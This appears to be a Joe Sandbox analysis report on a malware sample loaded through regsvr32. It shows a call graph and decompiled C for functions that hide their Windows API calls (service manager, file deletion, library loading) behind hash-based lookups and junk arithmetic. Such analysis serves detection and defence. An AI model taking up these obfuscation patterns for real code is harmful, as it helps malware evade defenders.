1e7f78 GetPEB 4727->4728 4729 1e8d75 4728->4729 4729->4597 4733 1ea504 4730->4733 4731 1e303a 2 API calls 4731->4733 4732 1ea73d 4735 1e4e8f GetPEB 4732->4735 4733->4731 4733->4732 4734 1ea73b 4733->4734 4734->4597 4735->4734 4737 1f68f7 4736->4737 4738 1e7f78 GetPEB 4737->4738 4739 1f697d 4738->4739 4739->4597 4741 1ed3d5 4740->4741 4742 1e7f78 GetPEB 4741->4742 4743 1ed45b 4742->4743 4743->3978 4745 1ec0ca 4744->4745 4746 1e7f78 GetPEB 4745->4746 4747 1ec145 4746->4747 4747->3978 4749 200e0b 4748->4749 4750 1e7f78 GetPEB 4749->4750 4751 200e6a 4750->4751 4751->3982 4753 1f266d 4752->4753 4754 1e7f78 GetPEB 4753->4754 4755 1f26e4 4754->4755 4755->3982 4758 1e2312 4756->4758 4757 1f0430 GetPEB 4757->4758 4758->4757 4759 1e303a 2 API calls 4758->4759 4760 1e25ce 4758->4760 4761 1e2606 4758->4761 4759->4758 4770 1f0430 4760->4770 4761->3982 4764 1e7f78 GetPEB 4763->4764 4765 1f3e80 4764->4765 4765->3982 4767 1e7c8d 4766->4767 4768 1e7f78 GetPEB 4767->4768 4769 1e7cf8 4768->4769 4769->3982 4771 1f0463 4770->4771 4772 1e7f78 GetPEB 4771->4772 4773 1f04eb 4772->4773 4773->4761 4775 1fee30 4774->4775 4776 1e7f78 GetPEB 4775->4776 4777 1feeb4 4776->4777 4777->3805 4779 1f6d86 4778->4779 4780 1e7f78 GetPEB 4779->4780 4781 1f6e0c 4780->4781 4781->3997 4783 1e3f7b 4782->4783 4785 1e419a 4783->4785 4786 1e41f2 4783->4786 4803 1e3dfb 4783->4803 4787 1ee4f5 2 API calls 4785->4787 4786->4006 4788 1e41ac 4787->4788 4794 1f3094 4788->4794 4793 1ff94b GetPEB 4793->4786 4807 1f3c24 4794->4807 4798 1e41b8 4799 1e7f31 4798->4799 4800 1e7f56 4799->4800 4801 1eadb7 GetPEB 4800->4801 4802 1e41db 4801->4802 4802->4793 4804 1e3e15 4803->4804 4805 1e7f78 GetPEB 4804->4805 4806 1e3e89 4805->4806 4806->4783 4808 1f3c40 4807->4808 4809 1e7f78 GetPEB 4808->4809 4810 1f31d0 4809->4810 4810->4798 4811 1f660b 4810->4811 4812 1f6638 4811->4812 4813 1e7f78 GetPEB 4812->4813 4814 1f66b2 4813->4814 4814->4798 4816 1e3ed1 4815->4816 4817 1e7f78 GetPEB 4816->4817 4818 1e3f40 4817->4818 4818->4014 4820 1f7a94 4819->4820 4821 1e7f78 GetPEB 4820->4821 4822 1f7b0d 4821->4822 4822->4014 4824 1f3cd4 4823->4824 4825 1e7f78 GetPEB 4824->4825 4826 1f3d50 4825->4826 4826->4014 4838 1f86ee 4827->4838 4831 1f7bbf 4830->4831 4861 1ebd6b 4831->4861 4834 1f7d95 4834->4023 4837 1f02d8 2 API calls 4837->4834 4842 1f871a 4838->4842 4841 1f8946 4843 1f02d8 2 API calls 4841->4843 4842->4841 4844 1ecaf4 4842->4844 4847 1e823e 4842->4847 4851 1ebe5e 4842->4851 4854 1ffc9e 4842->4854 4858 1e26a7 4842->4858 4843->4844 4844->4023 4848 1e8254 4847->4848 4849 1e7f78 GetPEB 4848->4849 4850 1e82c4 4849->4850 4850->4842 4852 1e7f78 GetPEB 4851->4852 4853 1ebed7 4852->4853 4853->4842 4855 1ffcb7 4854->4855 4856 1e7f78 GetPEB 4855->4856 4857 1ffd34 4856->4857 4857->4842 4859 1f1919 GetPEB 4858->4859 4860 1e26f5 4859->4860 4860->4842 4862 1e7f78 GetPEB 4861->4862 4863 1ebdda 4862->4863 4863->4834 4864 1ff73b 4863->4864 4865 1ff75d 4864->4865 4866 1e7f78 GetPEB 4865->4866 4867 1f7d83 4866->4867 4867->4837 4875 1fe8c1 4868->4875 4869 1fea86 4871 1f17d2 GetPEB 4869->4871 4870 1e303a 2 API calls 4870->4875 4872 1fea97 4871->4872 4872->4043 4874 1ff5d9 2 API calls 4874->4875 4875->4869 4875->4870 4875->4872 4875->4874 4876 20224c GetPEB 4875->4876 4877 1ff94b GetPEB 4875->4877 4886 1f8ef8 4875->4886 4876->4875 4877->4875 4879 1f8d5c 4878->4879 4880 1f8d46 4878->4880 4879->4043 4880->4879 4881 1f17d2 GetPEB 4880->4881 4881->4880 4883 1ebe04 4882->4883 4890 1e7d03 4883->4890 4887 1f8f15 4886->4887 4888 1e303a 2 API calls 4887->4888 4889 1f9000 4888->4889 4889->4875 4892 1e7d1b 4890->4892 4894 1e7e67 4892->4894 4897 1e7e65 4892->4897 4898 1e303a 2 API calls 4892->4898 4899 1f0503 4892->4899 4915 1f8d61 4892->4915 4920 1e2710 4892->4920 4896 1f17d2 GetPEB 4894->4896 4896->4897 4897->4043 4898->4892 4902 1f12cb 4899->4902 4901 1f2519 GetPEB 4901->4902 4902->4901 4907 1ff5d9 GetPEB RtlAllocateHeap 4902->4907 4908 1f17c5 4902->4908 4909 1fa379 GetPEB 4902->4909 4911 1ffd42 GetPEB 4902->4911 4913 1ed2c9 GetPEB 4902->4913 4914 1ff94b GetPEB 4902->4914 4929 1e866c 4902->4929 4933 1f64cf 4902->4933 4937 1eed0a 4902->4937 4951 1ec98b 4902->4951 4955 1f970d 4902->4955 4959 1ea838 4902->4959 4963 1ec01c 4902->4963 4907->4902 4908->4892 4909->4902 4911->4902 4913->4902 4914->4902 4916 1f64cf GetPEB 4915->4916 4917 1f8e04 4916->4917 4918 1f17d2 GetPEB 4917->4918 4919 1f8e16 4918->4919 4919->4892 4925 1e2d16 4920->4925 4921 1e2edc 4923 1f2519 GetPEB 4921->4923 4922 1e2eda 4922->4892 4923->4922 4924 1ff5d9 GetPEB RtlAllocateHeap 4924->4925 4925->4921 4925->4922 4925->4924 4926 1e866c GetPEB 4925->4926 4927 1ed2c9 GetPEB 4925->4927 4928 1ff94b GetPEB 4925->4928 4926->4925 4927->4925 4928->4925 4930 1e86a1 4929->4930 4931 1e7f78 GetPEB 4930->4931 4932 1e8728 4931->4932 4932->4902 4934 1f64e2 4933->4934 4935 1e7f78 GetPEB 4934->4935 4936 1f6555 4935->4936 4936->4902 4946 1efc94 4937->4946 4938 1f014c 4940 1f2519 GetPEB 4938->4940 4939 1f014a 4939->4902 4940->4939 4942 1e303a 2 API calls 4942->4946 4943 1f17d2 GetPEB 4943->4946 4944 1eeb4b GetPEB 4944->4946 4945 1ff5d9 GetPEB RtlAllocateHeap 4945->4946 4946->4938 4946->4939 4946->4942 4946->4943 4946->4944 4946->4945 4947 1f0184 GetPEB 4946->4947 4948 1ed2c9 GetPEB 4946->4948 4950 1ff94b GetPEB 4946->4950 4967 1e7a69 4946->4967 4971 1fa42c 4946->4971 4947->4946 4948->4946 4950->4946 4952 1ec9a7 4951->4952 4953 1e7f78 GetPEB 4952->4953 4954 1eca27 4953->4954 4954->4902 4956 1f972f 4955->4956 4957 1e7f78 GetPEB 4956->4957 4958 1f979e 4957->4958 4958->4902 4960 1ea865 4959->4960 4961 1e7f78 GetPEB 4960->4961 4962 1ea8e7 4961->4962 4962->4902 4964 1ec035 4963->4964 4965 1e7f78 GetPEB 4964->4965 4966 1ec0ac 4965->4966 4966->4902 4968 1e7a97 4967->4968 4969 1e7f78 GetPEB 4968->4969 4970 1e7b06 4969->4970 4970->4946 4972 1fa461 4971->4972 4973 1e7f78 GetPEB 4972->4973 4974 1fa4e8 4973->4974 4974->4946 4976 201a26 4975->4976 4977 1f25cd GetPEB 4976->4977 4978 201b7b 4976->4978 4981 201b98 4976->4981 4999 1e94d4 4976->4999 4977->4976 4995 1e33b6 4978->4995 4981->4051 4987 1ec83c 4982->4987 4983 1ff5d9 2 API calls 4983->4987 4984 1ec967 4986 1f3cbe GetPEB 4984->4986 4985 1e3e99 GetPEB 4985->4987 4988 1ec965 4986->4988 4987->4983 4987->4984 4987->4985 4987->4988 4989 1ff94b GetPEB 4987->4989 5003 1e6c71 4987->5003 4988->4051 4989->4987 4992 1e35ca 4991->4992 4993 1e7f78 GetPEB 4992->4993 4994 1e3643 4993->4994 4994->4059 4996 1e33d4 4995->4996 4997 1e7f78 GetPEB 4996->4997 4998 1e3453 4997->4998 4998->4981 5000 1e94f1 4999->5000 5001 1e7f78 GetPEB 5000->5001 5002 1e957c 5001->5002 5002->4976 5004 1e6c8e 5003->5004 5005 1e7f78 GetPEB 5004->5005 5006 1e6d06 5005->5006 5006->4987 5007 1f6998 5008 1e2263 GetPEB 5007->5008 5009 1f6c12 5008->5009 5020 1ebee4 5009->5020 5012 1ff5d9 2 API calls 5013 1f6c49 5012->5013 5014 1f8eb3 GetPEB 5013->5014 5015 1f6c70 5014->5015 5016 1ff94b GetPEB 5015->5016 5017 1f6c83 5016->5017 5018 1e7bc6 2 API calls 5017->5018 5019 1f6c95 5018->5019 5021 1ebefd 5020->5021 5022 1e7f78 GetPEB 5021->5022 5023 1ebf7c 5022->5023 5023->5012 5023->5019 5024 1ff7f4 5025 1ff8f9 5024->5025 5026 1ee4f5 2 API calls 5025->5026 5031 1ff93e 5025->5031 5027 1ff90e 5026->5027 5032 1e9343 5027->5032 5030 1ff94b GetPEB 5030->5031 5033 1e935e 5032->5033 5035 1e94a2 5033->5035 5036 1f9635 5033->5036 5035->5030 5037 1f964e 5036->5037 5038 1e7f78 GetPEB 5037->5038 5039 1f96c5 5038->5039 5039->5033 5040 1e4313 5046 1e484a 5040->5046 5042 1e303a 2 API calls 5042->5046 5043 1f17d2 GetPEB 5043->5046 5044 1e4a79 5045 1f02d8 2 API calls 5044->5045 5048 1e4a77 5045->5048 5046->5042 5046->5043 5046->5044 5047 200575 GetPEB 5046->5047 5046->5048 5050 1ebee4 GetPEB 5046->5050 5051 1fa50a 2 API calls 5046->5051 5052 1e2263 GetPEB 5046->5052 5053 1feb61 5046->5053 5057 1f487b 5046->5057 5047->5046 5050->5046 5051->5046 5052->5046 5054 1feb8f 5053->5054 5055 1e7f78 GetPEB 5054->5055 5056 1fec19 5055->5056 5056->5046 5058 1f488b 5057->5058 5059 1e7f78 GetPEB 5058->5059 5060 1f4902 5059->5060 5060->5046

                                                                                                                Executed Functions

                                                                                                                Function 001E6E01 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 431 1e6e01-1e6eb3 call 1ec98a call 1e7f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E001E6E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t36;
				void* _t46;
				signed int _t48;
				signed int _t49;

				_push(0);
				_push(_a12);
				_push(_a8);
				_push(0);
				E001EC98A(_t36);
				_v32 = 0x5e4691;
				_v28 = 0xb22c2d;
				_v24 = 0xd08f35;
				_v20 = 0;
				_v16 = 0x466167;
				_t48 = 0x37;
				_v16 = _v16 / _t48;
				_v16 = _v16 ^ 0x000b48c4;
				_v8 = 0x78b9b;
				_t49 = 0x12;
				_v8 = _v8 / _t49;
				_v8 = _v8 + 0x94cf;
				_v8 = _v8 ^ 0x0006a86d;
				_v12 = 0x7d284b;
				_v12 = _v12 + 0xfffff9ba;
				_v12 = _v12 ^ 0x007a5aaa;
				E001E7F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
				_t46 = OpenSCManagerW(0, 0, _a12); // executed
				return _t46;
			}














                                                                                                                0x001e6e0a
                                                                                                                0x001e6e0b
                                                                                                                0x001e6e0e
                                                                                                                0x001e6e11
                                                                                                                0x001e6e14
                                                                                                                0x001e6e1c
                                                                                                                0x001e6e23
                                                                                                                0x001e6e2c
                                                                                                                0x001e6e33
                                                                                                                0x001e6e36
                                                                                                                0x001e6e42
                                                                                                                0x001e6e47
                                                                                                                0x001e6e4c
                                                                                                                0x001e6e53
                                                                                                                0x001e6e5d
                                                                                                                0x001e6e65
                                                                                                                0x001e6e6d
                                                                                                                0x001e6e74
                                                                                                                0x001e6e7b
                                                                                                                0x001e6e82
                                                                                                                0x001e6e89
                                                                                                                0x001e6ea0
                                                                                                                0x001e6ead
                                                                                                                0x001e6eb3

                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 001E6EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction ID: 1b4459b95d6703c1b4caa44625aa43f6961021ab71a9828ffaaeffa4704f9e5d
                                                                                                                • Opcode Fuzzy Hash: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction Fuzzy Hash: 2F1146B2D01218BBDB04DFA6C8498DEBFB6EB45314F108189E518A6241D7B55B259B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001E8E38 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 545 1e8e38-1e8ee4 call 1ec98a call 1e7f78 OpenServiceW
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E001E8E38(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t37;
				void* _t46;
				signed int _t48;
				int _t53;

				_push(_a16);
				_t53 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001EC98A(_t37);
				_v12 = 0x1c994a;
				_v12 = _v12 << 3;
				_v12 = _v12 + 0xffff2161;
				_v12 = _v12 | 0xd2ae04c7;
				_v12 = _v12 ^ 0xd2e10dca;
				_v8 = 0x3225a3;
				_v8 = _v8 + 0xb485;
				_t48 = 0x24;
				_v8 = _v8 / _t48;
				_v8 = _v8 + 0x1169;
				_v8 = _v8 ^ 0x000adbd5;
				_v16 = 0x918fbd;
				_v16 = _v16 * 0x4a;
				_v16 = _v16 ^ 0x2a1cf10f;
				E001E7F78(_t48, 0x616ae4, _t48, 0xe4, _t48, 0x7315a644);
				_t46 = OpenServiceW(_a16, _a12, _t53); // executed
				return _t46;
			}










                                                                                                                0x001e8e3f
                                                                                                                0x001e8e42
                                                                                                                0x001e8e44
                                                                                                                0x001e8e47
                                                                                                                0x001e8e4a
                                                                                                                0x001e8e4e
                                                                                                                0x001e8e4f
                                                                                                                0x001e8e54
                                                                                                                0x001e8e5e
                                                                                                                0x001e8e64
                                                                                                                0x001e8e6b
                                                                                                                0x001e8e72
                                                                                                                0x001e8e79
                                                                                                                0x001e8e80
                                                                                                                0x001e8e8c
                                                                                                                0x001e8e94
                                                                                                                0x001e8e9c
                                                                                                                0x001e8ea3
                                                                                                                0x001e8eaa
                                                                                                                0x001e8ebc
                                                                                                                0x001e8ebf
                                                                                                                0x001e8ecf
                                                                                                                0x001e8ede
                                                                                                                0x001e8ee4

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001E8EDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 3098006287-1100367487
                                                                                                                • Opcode ID: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction ID: bcb6cd587c426ca5ef08a7bade9ac400f23fd2331a6a381af0916262dd389e04
                                                                                                                • Opcode Fuzzy Hash: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction Fuzzy Hash: 59112272E01208FBEF05DFA4DA4A8DEBFB6EB15314F10C089E914A6250E7B55B219F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001E7BC6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 550 1e7bc6-1e7c79 call 1ec98a call 1e7f78 DeleteFileW
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001E7BC6(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t42;
				int _t52;
				signed int _t54;
				signed int _t55;

				_push(_a4);
				E001EC98A(_t42);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0xa8f244;
				_v16 = 0x845cf1;
				_t54 = 0x49;
				_v16 = _v16 / _t54;
				_v16 = _v16 | 0x150b5070;
				_v16 = _v16 ^ 0x15045549;
				_v12 = 0xcbfb15;
				_v12 = _v12 ^ 0x1a866322;
				_v12 = _v12 + 0xffff3502;
				_v12 = _v12 ^ 0x1a48e6f8;
				_v8 = 0xe2385a;
				_v8 = _v8 | 0xfdf9d9f4;
				_t55 = 0x6e;
				_v8 = _v8 / _t55;
				_v8 = _v8 + 0xffffa480;
				_v8 = _v8 ^ 0x02430dde;
				E001E7F78(_t55, 0xbd3f148a, _t55, 0x1c4, _t55, 0x5b4e8958);
				_t52 = DeleteFileW(_a4); // executed
				return _t52;
			}













                                                                                                                0x001e7bcc
                                                                                                                0x001e7bd1
                                                                                                                0x001e7bd6
                                                                                                                0x001e7bdd
                                                                                                                0x001e7be3
                                                                                                                0x001e7bea
                                                                                                                0x001e7bf6
                                                                                                                0x001e7bfb
                                                                                                                0x001e7c00
                                                                                                                0x001e7c07
                                                                                                                0x001e7c0e
                                                                                                                0x001e7c15
                                                                                                                0x001e7c1c
                                                                                                                0x001e7c23
                                                                                                                0x001e7c2a
                                                                                                                0x001e7c31
                                                                                                                0x001e7c3b
                                                                                                                0x001e7c43
                                                                                                                0x001e7c4b
                                                                                                                0x001e7c52
                                                                                                                0x001e7c69
                                                                                                                0x001e7c74
                                                                                                                0x001e7c79

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(1A48E6F8), ref: 001E7C74
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: Z8
                                                                                                                • API String ID: 4033686569-4113373922
                                                                                                                • Opcode ID: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction ID: 785961576bb061d842a0ca61fda983580ac6fa095c7a6c95bc3424cd723b09f8
                                                                                                                • Opcode Fuzzy Hash: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction Fuzzy Hash: 91116DB1D0024CFFDB08DFE5D94AA9EBBB1EB50304F208198E414B7290D7B65B548F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001FED7B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 555 1fed7b-1fee13 call 1ec98a call 1e7f78 CloseServiceHandle
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E001FED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t33;
				int _t43;
				signed int _t45;
				signed int _t46;
				void* _t53;

				_push(_a8);
				_t53 = __ecx;
				_push(_a4);
				_push(__ecx);
				E001EC98A(_t33);
				_v16 = 0xcf28aa;
				_v16 = _v16 + 0xffff6a13;
				_v16 = _v16 ^ 0x00c8c4e4;
				_v12 = 0x49ff01;
				_t45 = 0xb;
				_v12 = _v12 / _t45;
				_t46 = 0x5d;
				_v12 = _v12 / _t46;
				_v12 = _v12 ^ 0x00001054;
				_v8 = 0x2a1e4a;
				_v8 = _v8 | 0x32e5c17e;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00072801;
				E001E7F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
				_t43 = CloseServiceHandle(_t53); // executed
				return _t43;
			}











                                                                                                                0x001fed82
                                                                                                                0x001fed85
                                                                                                                0x001fed87
                                                                                                                0x001fed8b
                                                                                                                0x001fed8c
                                                                                                                0x001fed91
                                                                                                                0x001fed9b
                                                                                                                0x001feda4
                                                                                                                0x001fedab
                                                                                                                0x001fedb7
                                                                                                                0x001fedbc
                                                                                                                0x001fedc4
                                                                                                                0x001fedcc
                                                                                                                0x001fedd4
                                                                                                                0x001feddb
                                                                                                                0x001fede2
                                                                                                                0x001fede9
                                                                                                                0x001feded
                                                                                                                0x001fee04
                                                                                                                0x001fee0d
                                                                                                                0x001fee13

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.SECHOST(?,?,?,?,?,?,?,?,?), ref: 001FEE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction ID: 606a5a80d9e9b7083fa604d88505668408ea6b0d1192a84235344e453d393d3f
                                                                                                                • Opcode Fuzzy Hash: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction Fuzzy Hash: E2013972D00608BBDB08DFA5C94A8DEBFB5EF55314F10C08AE914A6241E7B25B558F80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001E4A9D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E001E4A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t32;
				struct HINSTANCE__* _t39;
				WCHAR* _t43;

				_push(_a8);
				_t43 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001EC98A(_t32);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0x1178a2;
				_v16 = 0x17846b;
				_v16 = _v16 | 0x3185073b;
				_v16 = _v16 + 0xffff538e;
				_v16 = _v16 ^ 0x3197b69f;
				_v12 = 0x16ba99;
				_v12 = _v12 ^ 0x02625a09;
				_v12 = _v12 ^ 0x25365766;
				_v12 = _v12 ^ 0x27431ab3;
				_v8 = 0xb183e3;
				_v8 = _v8 * 0x28;
				_v8 = _v8 | 0x77f20d23;
				_v8 = _v8 ^ 0x7ff151f0;
				E001E7F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
				_t39 = LoadLibraryW(_t43); // executed
				return _t39;
			}












                                                                                                                0x001e4aa4
                                                                                                                0x001e4aa7
                                                                                                                0x001e4aa9
                                                                                                                0x001e4aac
                                                                                                                0x001e4aad
                                                                                                                0x001e4aae
                                                                                                                0x001e4ab3
                                                                                                                0x001e4aba
                                                                                                                0x001e4ac3
                                                                                                                0x001e4aca
                                                                                                                0x001e4ad1
                                                                                                                0x001e4ad8
                                                                                                                0x001e4adf
                                                                                                                0x001e4ae6
                                                                                                                0x001e4aed
                                                                                                                0x001e4af4
                                                                                                                0x001e4afb
                                                                                                                0x001e4b02
                                                                                                                0x001e4b16
                                                                                                                0x001e4b19
                                                                                                                0x001e4b20
                                                                                                                0x001e4b30
                                                                                                                0x001e4b39
                                                                                                                0x001e4b3f

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction ID: a7aaf4623a56de2f1acc39edacb6cac062db4fc5c335f3ff9a6b4702b678dc80
                                                                                                                • Opcode Fuzzy Hash: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction Fuzzy Hash: 78114871C11208FFDB08DFA5DA469DEBBB4EB10315F20C188E415B6251D3704B148F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001F7B25 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001F7B25() {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _t31;

				_v16 = 0x340970;
				_t2 =  &_v16; // 0x340970
				_t31 = 0x26;
				_v16 =  *_t2 / _t31;
				_v16 = _v16 ^ 0x000e30ec;
				_v8 = 0x85299d;
				_v8 = _v8 + 0xa54a;
				_v8 = _v8 ^ 0x35a74c3e;
				_v8 = _v8 ^ 0x3521895a;
				_v12 = 0xcc7db5;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x000f948d;
				E001E7F78(_t31, 0xbd3f148a, _t31, 0x108, _t31, 0xac0441b9);
				ExitProcess(0);
			}







                                                                                                                0x001f7b2b
                                                                                                                0x001f7b34
                                                                                                                0x001f7b39
                                                                                                                0x001f7b41
                                                                                                                0x001f7b49
                                                                                                                0x001f7b50
                                                                                                                0x001f7b57
                                                                                                                0x001f7b5e
                                                                                                                0x001f7b65
                                                                                                                0x001f7b6c
                                                                                                                0x001f7b73
                                                                                                                0x001f7b77
                                                                                                                0x001f7b8e
                                                                                                                0x001f7b98

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 001F7B98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
